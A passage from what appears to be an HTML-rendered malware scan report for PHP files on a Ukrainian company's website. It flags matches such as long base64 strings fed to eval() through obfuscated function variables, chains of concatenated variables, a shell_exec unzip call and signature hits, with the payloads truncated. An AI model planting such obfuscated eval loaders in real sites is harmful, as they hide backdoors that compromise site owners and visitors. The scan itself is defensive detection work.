<span style="color: #0000BB"></span><span style="color: #DD0000">'7X1rd9u2sujne9e6/4HRdjbJWA/LzqtybMdxnMarSZrGTk/PsVwdmqIsNpSokJTjJPb+7RczeA1IUJbdpu1e56zWigQMBgNgMBgMBoOd7Sc7s/Hs//3fp/E0HuRR4blRlqXZIEnP3Kbz5v2rV/6mozNZ8gABcpa7ZmRNgjhpB8Ph4GIwjoJhlAmIMAny3Hn78u1rBhBlzldnNj9N4tBZ2RsH2WFUOFuOG+dp6/HjB9+1uu6mzk+nRTQtjj7PIoApoouiM0uCeEpg9qdhOoynZwDw+DQuaBbQeTAdpZBH0l9k6QSSsjQtniZpGCTjNC9KAG+CCVb6jgE573PWGp1/GE1Z80pY30XFPJu+DYpxKeNwfvpbFBal1Gfp8HMpaTcpaGqWFqxYNHRWXh+83q/PeYmdXc2D8TDzRD3/kWbD/8iCGUte06lidBgoFCy1FpIgqzPPs05+Gk87uUglgKyXJOyPsyJOpzkrUmTzSIO8TeZn8fR5XCa...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of arrays technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$cH</span><span style="color: #007700">.</span><span style="color: #0000BB">$ZnUq</span><span style="color: #007700">.</span><span style="color: #0000BB">$GqX</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$ePpE</span><span style="color: #007700">.</span><span style="color: #0000BB">$P</span><span style="color: #007700">.</span><span style="color: #0000BB">$XHXyA</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$mpy</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat_vars_with_spaces <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of vars technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$GBPBD</span><span style="color: #007700">.</span><span style="color: #0000BB">$gu</span><span style="color: #007700">.</span><span style="color: #0000BB">$XE</span><span style="color: #007700">.</span><span style="color: #0000BB">$iO</span><span style="color: #007700">.</span><span style="color: #0000BB">$pPdi</span><span style="color: #007700">.</span><span style="color: #0000BB">$emqDZ</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$gQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$ZiwpR</span><span style="color: #007700">(</span><span style="color: #DD0000">'7X1rd9u2sujne9e6/4HRdjbJWA/LzqtybMdxnMarSZrGTk/PsVwdmqIsNpSokJTjJPb+7RczeA1IUJbdpu1e56zWigQMBgNgMBgMBoOd7Sc7s/Hs//3fp/E0HuRR4blRlqXZIEnP3Kbz5v2rV/6mozNZ8gABcpa7ZmRNgjhpB8Ph4GIwjoJhlAmIMAny3Hn78u1rBhBlzldnNj9N4tBZ2RsH2WFUOFuOG+dp6/HjB9+1uu6mzk+nRTQtjj7PIoApoouiM0uCeEpg9qdhOoynZwDw+DQuaBbQeTAdpZBH0l9k6QSSsjQtniZpGCTjNC9KAG+CCVb6jgE573PWGp1/GE1Z80pY30XFPJu+DYpxKeNwfvpbFBal1Gfp8HMpaTcpaGqWFqxYNHRWXh+83q/PeYmdXc2D8TDzRD3/kWbD/8iCGUte06lidBgoFCy1FpIgqzPPs05+Gk87uUglgKyXJOyPsyJOpzkrUmT...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 84abfe10 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 84abfe10)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$cH</span><span style="color: #007700">.</span><span style="color: #0000BB">$ZnUq</span><span style="color: #007700">.</span><span style="color: #0000BB">$GqX</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$ePpE</span><span style="color: #007700">.</span><span style="color: #0000BB">$P</span><span style="color: #007700">.</span><span style="color: #0000BB">$XHXyA</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$mpy</span><span style="color: #007700">.</span><span style="color: #0000BB">$nom</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_14").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/installer-backup.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 57.71 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:47</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_15" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$unzip_command</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$lib_directory&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">dirname</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">).</span><span style="color: #DD0000">'/'</span><span style="color: #007700">.</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">INSTALLER_DIR_NAME</span><span style="color: #007700">.</span><span style="color: #DD0000">'/lib'</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$snaplib_directory&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$lib_directory</span><span style="color: #007700">.</span><span style="color: #DD0000">'/snaplib'</span><span style="color: #007700">;&nbsp;if(!</span><span style="color: #0000BB">file_exists</span><span style="color: #007700">(</span><span style="color: #0000BB">$snaplib_directory</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">$local_lib_directory&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">dirname</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">).</span><span style="color: #DD0000">'/snaplib'</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$unzip_command&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"</span><span style="color: #0000BB">$unzip_filepath</span><span style="color: #DD0000">&nbsp;-q&nbsp;</span><span style="color: #0000BB">$archive_filepath</span><span style="color: #DD0000">&nbsp;snaplib/*&nbsp;2&gt;&amp;1"</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">log</span><span style="color: #007700">(</span><span style="color: #DD0000">"Executing&nbsp;</span><span style="color: #0000BB">$unzip_command</span><span style="color: #DD0000">"</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$stderr&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$unzip_command</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">mkdir</span><span style="color: #007700">(</span><span style="color: #0000BB">$lib_directory</span><span style="color: #007700">,</span><span style="color: #DD0000">'u+rwx'</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">rename</span><span style="color: #007700">(</span><span style="color: #0000BB">$local_lib_directory</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$snaplib_directory</span><span style="color: #007700">);&nbsp;}&nbsp;if&nbsp;(</span><span style="color: #0000BB">$stderr&nbsp;</span><span style="color: #007700">==&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">)&nbsp;{&nbsp;...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1140</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_15").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/last.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 18.47 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:02</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 4</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_16" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'7X1rd9s20vD355znPzBaZyk1uviSW+3YqeMojc/asWs73ezarh5aomw2lKiQVOKkyfvbX8wFNxKU5DTpbfe0kSVgMBgAgwEwmBk83nr0eHI1+d//+S4aR70szOt+mKZJ2ouTS7/pvXi5t9fY8HSmSO4hQCZyl62sURDF7WAw6F33rsJgEKYliPB6kmRhT9TnN+eX9ZPh0K8s78hFutNwkqR5NL4s1T6IskkcvLfJX0rigcCXhfHQ2/SWesfdox+7R6f+4fND8X3vmX9OMGk4SnJB2SC1wI66+wcn3d7206dHCOkoL+BrndpGVSELHf1V6PpxkGXe8f7JofeLN5lexFHfW4KfvcODoxNRcvXehkrfOdp7BnWdpWfjmk4eJL1BeDG91ClP4WcyzSfTHODD/lViw78N04nIGQZxFuqMk2gUJlhk5Z6dGkejCNLXlnX6j2GaRclYpPr32qvtVV9kpdHbIA+9pWyUT3r9ZDw20nBQjN9XYZz...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of arrays technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$EjSZ</span><span style="color: #007700">.</span><span style="color: #0000BB">$cDRUH</span><span style="color: #007700">.</span><span style="color: #0000BB">$jMAMh</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$Bkor</span><span style="color: #007700">.</span><span style="color: #0000BB">$Sus</span><span style="color: #007700">.</span><span style="color: #0000BB">$CDaO</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$LGe</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat_vars_with_spaces <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of vars technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$CDaO</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$LGe</span><span style="color: #007700">.</span><span style="color: #0000BB">$wOxb</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$G</span><span style="color: #007700">(</span><span style="color: #0000BB">$oaj</span><span style="color: #007700">(</span><span style="color: #DD0000">'7X1rd9s20vD355znPzBaZyk1uviSW+3YqeMojc/asWs73ezarh5aomw2lKiQVOKkyfvbX8wFNxKU5DTpbfe0kSVgMBgAgwEwmBk83nr0eHI1+d//+S4aR70szOt+mKZJ2ouTS7/pvXi5t9fY8HSmSO4hQCZyl62sURDF7WAw6F33rsJgEKYliPB6kmRhT9TnN+eX9ZPh0K8s78hFutNwkqR5NL4s1T6IskkcvLfJX0rigcCXhfHQ2/SWesfdox+7R6f+4fND8X3vmX9OMGk4SnJB2SC1wI66+wcn3d7206dHCOkoL+BrndpGVSELHf1V6PpxkGXe8f7JofeLN5lexFHfW4KfvcODoxNRcvXehkrfOdp7BnWdpWfjmk4eJL1BeDG91ClP4WcyzSfTHODD/lViw78N04nIGQZxFuqMk2gUJlhk5Z6dGkejCNLXlnX6j2GaRclYpPr32qvtVV9kpdHbIA+9pWyUT3r9ZD...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 84abfe10 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 84abfe10)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$EjSZ</span><span style="color: #007700">.</span><span style="color: #0000BB">$cDRUH</span><span style="color: #007700">.</span><span style="color: #0000BB">$jMAMh</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$Bkor</span><span style="color: #007700">.</span><span style="color: #0000BB">$Sus</span><span style="color: #007700">.</span><span style="color: #0000BB">$CDaO</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$LGe</span><span style="color: #007700">.</span><span style="color: #0000BB">$wOxb</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_16").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/installer1.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 57.71 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:18</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_17" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$unzip_command</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$lib_directory&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">dirname</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">).</span><span style="color: #DD0000">'/'</span><span style="color: #007700">.</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">INSTALLER_DIR_NAME</span><span style="color: #007700">.</span><span style="color: #DD0000">'/lib'</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$snaplib_directory&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$lib_directory</span><span style="color: #007700">.</span><span style="color: #DD0000">'/snaplib'</span><span style="color: #007700">;&nbsp;if(!</span><span style="color: #0000BB">file_exists</span><span style="color: #007700">(</span><span style="color: #0000BB">$snaplib_directory</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">$local_lib_directory&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">dirname</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">).</span><span style="color: #DD0000">'/snaplib'</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$unzip_command&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"</span><span style="color: #0000BB">$unzip_filepath</span><span style="color: #DD0000">&nbsp;-q&nbsp;</span><span style="color: #0000BB">$archive_filepath</span><span style="color: #DD0000">&nbsp;snaplib/*&nbsp;2&gt;&amp;1"</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">log</span><span style="color: #007700">(</span><span style="color: #DD0000">"Executing&nbsp;</span><span style="color: #0000BB">$unzip_command</span><span style="color: #DD0000">"</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$stderr&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$unzip_command</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">mkdir</span><span style="color: #007700">(</span><span style="color: #0000BB">$lib_directory</span><span style="color: #007700">,</span><span style="color: #DD0000">'u+rwx'</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">rename</span><span style="color: #007700">(</span><span style="color: #0000BB">$local_lib_directory</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$snaplib_directory</span><span style="color: #007700">);&nbsp;}&nbsp;if&nbsp;(</span><span style="color: #0000BB">$stderr&nbsp;</span><span style="color: #007700">==&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">)&nbsp;{&nbsp;...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1140</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_17").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/ene.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 18.47 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:18</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 4</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_18" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'7X1rd9s20vD355znPzBaZyk1uviSW+3YqeMojc/asWs73ezarh5aomw2lKiQVOKkyfvbX8wFNxKU5DTpbfe0kSVgMBgAgwEwmBk83nr0eHI1+d//+S4aR70szOt+mKZJ2ouTS7/pvXi5t9fY8HSmSO4hQCZyl62sURDF7WAw6F33rsJgEKYliPB6kmRhT9TnN+eX9ZPh0K8s78hFutNwkqR5NL4s1T6IskkcvLfJX0rigcCXhfHQ2/SWesfdox+7R6f+4fND8X3vmX9OMGk4SnJB2SC1wI66+wcn3d7206dHCOkoL+BrndpGVSELHf1V6PpxkGXe8f7JofeLN5lexFHfW4KfvcODoxNRcvXehkrfOdp7BnWdpWfjmk4eJL1BeDG91ClP4WcyzSfTHODD/lViw78N04nIGQZxFuqMk2gUJlhk5Z6dGkejCNLXlnX6j2GaRclYpPr32qvtVV9kpdHbIA+9pWyUT3r9ZDw20nBQjN9XYZz...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of arrays technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$EjSZ</span><span style="color: #007700">.</span><span style="color: #0000BB">$cDRUH</span><span style="color: #007700">.</span><span style="color: #0000BB">$jMAMh</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$Bkor</span><span style="color: #007700">.</span><span style="color: #0000BB">$Sus</span><span style="color: #007700">.</span><span style="color: #0000BB">$CDaO</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$LGe</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat_vars_with_spaces <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of vars technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$CDaO</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$LGe</span><span style="color: #007700">.</span><span style="color: #0000BB">$wOxb</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$G</span><span style="color: #007700">(</span><span style="color: #0000BB">$oaj</span><span style="color: #007700">(</span><span style="color: #DD0000">'7X1rd9s20vD355znPzBaZyk1uviSW+3YqeMojc/asWs73ezarh5aomw2lKiQVOKkyfvbX8wFNxKU5DTpbfe0kSVgMBgAgwEwmBk83nr0eHI1+d//+S4aR70szOt+mKZJ2ouTS7/pvXi5t9fY8HSmSO4hQCZyl62sURDF7WAw6F33rsJgEKYliPB6kmRhT9TnN+eX9ZPh0K8s78hFutNwkqR5NL4s1T6IskkcvLfJX0rigcCXhfHQ2/SWesfdox+7R6f+4fND8X3vmX9OMGk4SnJB2SC1wI66+wcn3d7206dHCOkoL+BrndpGVSELHf1V6PpxkGXe8f7JofeLN5lexFHfW4KfvcODoxNRcvXehkrfOdp7BnWdpWfjmk4eJL1BeDG91ClP4WcyzSfTHODD/lViw78N04nIGQZxFuqMk2gUJlhk5Z6dGkejCNLXlnX6j2GaRclYpPr32qvtVV9kpdHbIA+9pWyUT3r9ZD...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 84abfe10 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 84abfe10)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$EjSZ</span><span style="color: #007700">.</span><span style="color: #0000BB">$cDRUH</span><span style="color: #007700">.</span><span style="color: #0000BB">$jMAMh</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$Bkor</span><span style="color: #007700">.</span><span style="color: #0000BB">$Sus</span><span style="color: #007700">.</span><span style="color: #0000BB">$CDaO</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$LGe</span><span style="color: #007700">.</span><span style="color: #0000BB">$wOxb</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_18").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/res.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.13 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:18</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 4</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_19" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'7X1rd9u2sujne9e6/4HRdjbJWA/LzqtybMdxnMarSZrGTk/PsVwdmqIsNpSokJTjJPb+7RczeA1IUJbdpu1e56zWigQMBgNgMBgMBoOd7Sc7s/Hs//3fp/E0HuRR4blRlqXZIEnP3Kbz5v2rV/6mozNZ8gABcpa7ZmRNgjhpB8Ph4GIwjoJhlAmIMAny3Hn78u1rBhBlzldnNj9N4tBZ2RsH2WFUOFuOG+dp6/HjB9+1uu6mzk+nRTQtjj7PIoApoouiM0uCeEpg9qdhOoynZwDw+DQuaBbQeTAdpZBH0l9k6QSSsjQtniZpGCTjNC9KAG+CCVb6jgE573PWGp1/GE1Z80pY30XFPJu+DYpxKeNwfvpbFBal1Gfp8HMpaTcpaGqWFqxYNHRWXh+83q/PeYmdXc2D8TDzRD3/kWbD/8iCGUte06lidBgoFCy1FpIgqzPPs05+Gk87uUglgKyXJOyPsyJOpzkrUmTzSIO8TeZn8fR5XCa...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of arrays technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
